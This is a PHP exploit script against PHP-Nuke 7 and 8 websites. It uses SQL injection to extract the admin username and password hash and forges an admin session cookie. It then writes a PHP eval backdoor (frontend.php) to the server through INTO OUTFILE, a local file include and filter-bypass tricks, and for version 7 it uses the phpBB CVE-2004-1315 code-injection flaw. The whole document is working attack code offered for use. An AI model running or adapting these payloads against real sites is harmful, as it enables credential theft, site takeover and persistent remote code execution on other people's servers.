function main()
{
    $user_input = getopt("t:c:a:");
    if ($user_input['t']) {
        $attack_url = $user_input['t'];
        if ($user_input['c']) {
            $user_cookie = $user_input['c'];
        }
        //This is only useful for debugging,  so its not listed in the useage.
        if ($user_input['a']) {
            $admin_cookie = $user_input['a'];
        }
    } else {
        print "Useage: ./php_exploit -t http://localhost\n";
        die("A user's cookie is required for 8.1.35 : ./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n");
    }
    $attack_url = str_replace("index.php", "", $attack_url);
    $http = new http_client();
    $sex = new php_nuke_blind_sql_injection($attack_url . "/");
    if (!$admin_cookie) {
        //This is what a cookie looks like:
        //2:user_name:21232f297a57a5a743894a0e4a801fc3:10::0:0:0:0:DeepBlue:4096
        //$user_cookie="user=MjphZG1pbjoyMTIzMmYyOTdhNTdhNWE3NDM4OTRhMGU0YTgwMWZjMzoxMDo6MDowOjA6MDpEZWVwQmx1ZTo0MDk2";
        if ($user_cookie) {
            print "Using cookie...\n";
            $http->cookie = $user_cookie;
            //1337+30000 is used as a pivot in parsing,  and to test for a sucessful injection.
            //This is NOT Blind SQL Injection,  we will be reading the result.  This attack works with magic_quotes_gpc on or off.
            $http->postdata = "title=wow\\&bodytext=/*&mood=" . urlencode("'*/,0,0,1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1") . "&status=no&submit=Add+New+Entry";
            $response = $http->send($attack_url . "/modules.php?name=Journal&file=savenew");
            //This part of the exploit is a bit strange sorry for the mess,  gotta realease!
            if (strstr($response, "javascript:history.go(-1)")) {
                //magic_quotes_gpc=on
                $http->postdata = "title=wow&jbodytext=text&mood=" . urlencode("',1337+30000,(select aid from nuke_authors limit 1),0,(select pwd from nuke_authors limit 1),1337+30000)-- 1") . "&status=no&submit=Add+New+Entry";
                $response = $http->send($attack_url . "/modules.php?name=Journal&file=savenew");
                $http->postdata = '';
                //Find the primary key of the journal entry we just created.
                $jid = $http->send($attack_url . "/modules.php?name=Journal&file=edit");
                //we should have the single quote that we escaped at the end of wow'
                $jid = explode("\">wow<", $jid);
                $jid = explode("jid=", $jid[0]);
                //Check the journal for the admin's username/password hash
                $response = $http->send($attack_url . "/modules.php?name=Journal&file=display&jid=" . $jid[1]);
                if (strpos($response, "31337")) {
                    list($junk, $aid, $pwd) = explode("31337 @ ", $response);
                    $aid = explode("<", $aid);
                    $pwd = explode("<", $pwd);
                    $user_name = $aid[0];
                    $pass_hash = $pwd[0];
                } else {
                    //magic_quotes_gpc=off
                    sleep(3);
                    $http->postdata = "title=wow\\&jbodytext=/*&mood=1&status=" . urlencode("no',(select aid from nuke_authors limit 1),(select pwd from nuke_authors limit 1))-- 1") . "&submit=Add+New+Entry";
                    $response = $http->send($attack_url . "/modules.php?name=Journal&file=savenew");
                    sleep(2);
                    $jid = $http->send($attack_url . "/modules.php?name=Journal&file=edit");
                    $jid = explode("\">wow<", $jid);
                    $jid = explode("jid=", $jid[0]);
                    $jid = explode("\">", $jid[1]);
                    //Check the journal for the admin's username/password hash
                    $response = $http->send($attack_url . "/modules.php?name=Journal&file=display&jid=" . $jid[0]);
                    $inj = explode("Last updated on ", $response);
                    $inj = explode(" @ ", $inj[1]);
                    $pass_hash = $inj[0];
                    $inj = explode("<", $inj[1]);
                    $user_name = $inj[0];
                }
            } else {
                $http->postdata = '';
                //Find the primary key of the journal entry we just created.
                $jid = $http->send($attack_url . "/modules.php?name=Journal&file=edit");
                //we should have the single quote that we escaped at the end of wow'
                $jid = explode("\">wow',<", $jid);
                $jid = explode("jid=", $jid[0]);
                //Check the journal for the admin's username/password hash
                $response = $http->send($attack_url . "/modules.php?name=Journal&file=display&jid=" . $jid[1]);
                if (!strpos($response, "31337")) {
                    die("target has patched!\n");
                } else {
                    print "Target vulnerable to a privilege escalation attack!!!\n";
                    list($junk, $aid, $pwd) = explode("31337 @ ", $response);
                    $aid = explode("<", $aid);
                    $pwd = explode("<", $pwd);
                    $user_name = $aid[0];
                    $pass_hash = $pwd[0];
                }
            }
        } else {
            $sex->sleep = "sleep(5)";
            print "Starting Attack Against:" . $attack_url . "/\n";
            print "Testing for blind sql injection...\n";
            if (!$sex->test_target()) {
                print "Target might be running 8.1.35\n";
                print "Try the privilege esciation attack to upload the shell:";
                die("./php_exploit -t http://localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n");
            }
            print "Target is vulnerable to blind sql injection!!!\n";
            print "Please Standby For Attack...\n";
            $pass_hash = $sex->find_md5("pwd");
            $user_name = $sex->find_string("aid");
            print "attacked used:" . $sex->request_count . " requests.\n";
        }
        print "Found Admin's name:" . $user_name . "\n";
        print "Found MD5 Password hash:" . $pass_hash . "\n";
        $admin_cookie = "admin=" . base64_encode($user_name . ":" . $pass_hash . ":") . ";";
    }
    print "Using Admin Session ID:\n" . $admin_cookie . "\n";
    $http->cookie = $admin_cookie;
    //ipban.php
    sleep(3);
    //This request will tell us what version of php-nuke it is.
    //If it is 8, Then the page gives us configuration information to perserve.
    $admin_options = $http->send($attack_url . "/admin.php?op=general");
    if (!strstr($admin_options, "Content-Length: 0")) {
        print "PHP-Nuke 8 detected.\n";
        $option_values = explode("value='", $admin_options);
        $x = 0;
        array_shift($option_values);
        //Parsing out and storing configuration values to restore them after the hack.
        foreach ($option_values as $value) {
            $value = explode("'", $value);
            $values[] = urlencode($value[0]);
            if ($x++ == 4) {
                break;
            }
        }
        //ipban.php
        sleep(2);
        //Enable error reporting
        $http->postdata = "xsitename=" . $values[0] . "&xnukeurl=" . $values[1] . "&xslogan=" . $values[2] . "&xstartdate=" . $values[3] . "&xadmingraphic=" . $values[4] . "&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=1&op=savegeneral";
        $error_reporting = $http->send($attack_url . "/admin.php");
        //Path diclosure in add_pwd.  We will trigger a warning by passing md5() the array add_pwd[].
        $http->postdata = "add_name=junk&add_aid=junk&add_email=junk&add_url=junk&add_admlanguage=&auth_modules%5B%5D=23&add_radminsuper=1&add_pwd[]=junk&op=AddAuthor";
        $remote_path = $http->getPath($attack_url . "/admin.php", 3);
        sleep(2);
        if (strstr($remote_path, ':\\')) {
            print "Windows box detected.\n";
            print "Remote path:{$remote_path}\n";
            print "Uploading backdoor...\n";
            $remote_path = addslashes(addslashes($remote_path . "\\frontend.php"));
            $backdoor = 'get_magic_quotes_gpc()?eval(stripslashes($_GET["e"])):eval($_GET["e"])';
            //Could have used a concat but php-nuke filters for it.  This hides <> from the xss filter.
            //union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php
            $http->postdata = "chng_uid=" . urlencode("' union/**/ select " . $sex->charEncode("<?php") . ",'" . $backdoor . "'," . $sex->charEncode("?>") . ",'','','','','','','','','','','','','','','' into outfile '" . $remote_path . "'-- 1");
            $re = $http->send($attack_url . "/admin.php?op=modifyUser");
            //Disable error reporting
            $http->postdata = "xsitename=" . $values[0] . "&xnukeurl=" . $values[1] . "&xslogan=" . $values[2] . "&xstartdate=" . $values[3] . "&xadmingraphic=" . $values[4] . "&xgfx_chk=0&xnuke_editor=1&xdisplay_errors=0&op=savegeneral";
            $error_reporting = $http->send($attack_url . "/admin.php");
        } else {
            print "*nix box detected.\n";
            print "Remote path:{$remote_path}\n";
            //Is mysql on the same machine as the httpd?
            sleep(2);
            $http->postdata = "chng_uid=" . urlencode("' or 1=(select if(substring(load_file('" . $remote_path . "/index.php'),1,1)='<',0,1))-- 1");
            $mysql_check = $http->send($attack_url . "/admin.php?op=modifyUser");
            if (strstr($mysql_check, "User Doesn't Exists!")) {
                print "MySQL isn't on the same machine or you do not have file privileges.\n";
                die("Remote code execution failed\n");
            }
            print "Uploading backdoor...\n";
            //ipban.php
            sleep(2);
            //Grab the theme,  this is needed to repair the database after the LFI
            $theme = $http->send($attack_url . "/admin.php?op=themes");
            $theme = explode('src="themes/', $theme);
            $theme = explode('/images/', $theme[1]);
            //Repair the database after the LFI.
            $backdoor_installer = 'function OpenTable(){} function themeheader(){} $db->sql_query("update ".$prefix."_config set Default_Theme=' . $sex->charEncode($theme[0]) . ', display_errors=0");';
            //This is a magic_quotes_gpc and mysql safe backdoor that fits on one line.
            $backdoor = 'get_magic_quotes_gpc()?eval(stripslashes(".chr(36)."_GET[".chr(34)."e".chr(34)."])):eval(".chr(36)."_GET[".chr(34)."e".chr(34)."])';
            //Install the backdoor in a relitive directory.
            $backdoor_installer .= 'file_put_contents($_SERVER["DOCUMENT_ROOT"].dirname($_SERVER["SCRIPT_NAME"])."/frontend.php",chr(60)."?php ' . $backdoor . '?".chr(62));';
            //charEncode is used to bypass XSS filters.
            //union/**/ bypasses the sql injection filter on line 414 in ./mainfile.php
            $http->postdata = "chng_uid=" . urlencode("' union/**/ select " . $sex->charEncode("<?php") . ",'" . $backdoor_installer . "'," . $sex->charEncode("?>") . ",'','','','','','','','','','','','','','','' into outfile '/tmp/theme.php'-- 1");
            $http->send($attack_url . "/admin.php?op=modifyUser");
            sleep(2);
            //local file include vulnerablity to execute /tmp/theme.php
            $http->postdata = "xDefault_Theme=../../../../../../../../../../../tmp&xoverwrite_theme=0&op=savethemes";
            $http->send($attack_url . "/admin.php");
            sleep(2);
            $http->postdata = '';
            //Fire off a get request to trigger the uploaded php file using LFI
            $http->send($attack_url);
            sleep(2);
            //Try the LFI again, just in case.
            $http->send($attack_url . "/admin.php");
        }
        sleep(2);
        //test if the backdoor works,  try and clean up after the exploit.
        $test_backdoor = $http->send($attack_url . "/frontend.php?e=" . urlencode("echo 31337;unlink('/tmp/theme.php');system('rm /tmp/theme.php');"));
        if (strstr($test_backdoor, "31337")) {
            print "Remote Code execution tested successfully:\n" . $attack_url . "/frontend.php?e=phpinfo()" . urlencode(';') . "\n";
        } else {
            print "Backdoor install failed!\n";
        }
    } else {
        ////PHP-Nuke 7.0 Remote Code Execution Exploit using CVE-2004-1315 which affects the phpBB 2.0.6 module.
        print "PHP-Nuke 7 detected.\n";
        $http->postdata = "";
        //send get requests.
        //Fire off a check for CVE-2004-1315,  phpbb maybe installed.
        //This is more like the oringal CVE-2004-1315: %2527.printf(20041315).%2527
        //php-nuke was not vulnerable to this because of mainfile line 50: \([^>]*"?[^)]*\)
        //to byapss this check double urlencode the parren () %2527.printf%252820041315%2529.%2527
        $try_exploit = $http->send($attack_url . "/modules.php?name=Forums&file=viewtopic&t=1&highlight=%2527.printf%252820041315%2529.%2527");
        //if the exploit didn't work,  then we might have to enable phpbb and populate it.
        if (!strstr($try_exploit, "20041315")) {
            //Enalbe PHPBB
            $http->send($attack_url . "/admin.php?op=module_status&mid=22&active=1");
            //create a new category for phpbb
            $http->postdata = "mode=addcat&categoryname=test&addcategory=Create+new+category";
            $t = $http->send($attack_url . "/modules/Forums/admin/admin_forums.php");
            //ipban.php
            sleep(2);
            //create a new form in the new category
            $http->postdata = "forumname%5B1%5D=t&addforum%5B1%5D=Create+new+forum&categoryname=test";
            $t = $http->send($attack_url . "/modules/Forums/admin/admin_forums.php?");
            $http->postdata = "forumname=t&forumdesc=t&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create+new+forum";
            $http->send($attack_url . "/modules/Forums/admin/admin_forums.php?");
            //create a new topic in the new form
            $http->postdata = "username=t&subject=t&addbbcode18=%23444444&addbbcode20=12&helpbox=Insert+URL%3A+%5Burl%5Dhttp%3A%2F%2Furl%5B%2Furl%5D+or+%5Burl%3Dhttp%3A%2F%2Furl%5DURL+text%5B%2Furl%5D++%28alt%2Bw%29&message=test&mode=newtopic&f=1&post=Submit";
            $http->send($attack_url . "/modules.php?name=Forums&file=posting");
            //ipban.php
            sleep(2);
            //access the first topic.
            $http->postdata = "";
            //Check to see if any of the first 10 topics are exploitable.
            for ($t = 1; $t < 10 && !strstr($try_exploit, "20041315"); $t++) {
                //Fire off a check for CVE-2004-1315.
                $try_exploit = $http->send($attack_url . "/modules.php?name=Forums&file=viewtopic&t=" . $t . "&highlight=%2527.printf%252820041315%2529.%2527");
            }
        }
        //Check if we where able to hit CVE-2004-1315.
        if (strstr($try_exploit, "20041315")) {
            print "Remote Code execution tested successfully:\n" . $attack_url . "/modules.php?name=Forums&file=viewtopic&t=" . --$t . "&highlight=%2527.phpinfo%2528%2529.%2527\nThis is a Doulbe urlencode()\n";
        } else {
            print "Remote code execution has failed!\n";
        }
    }
}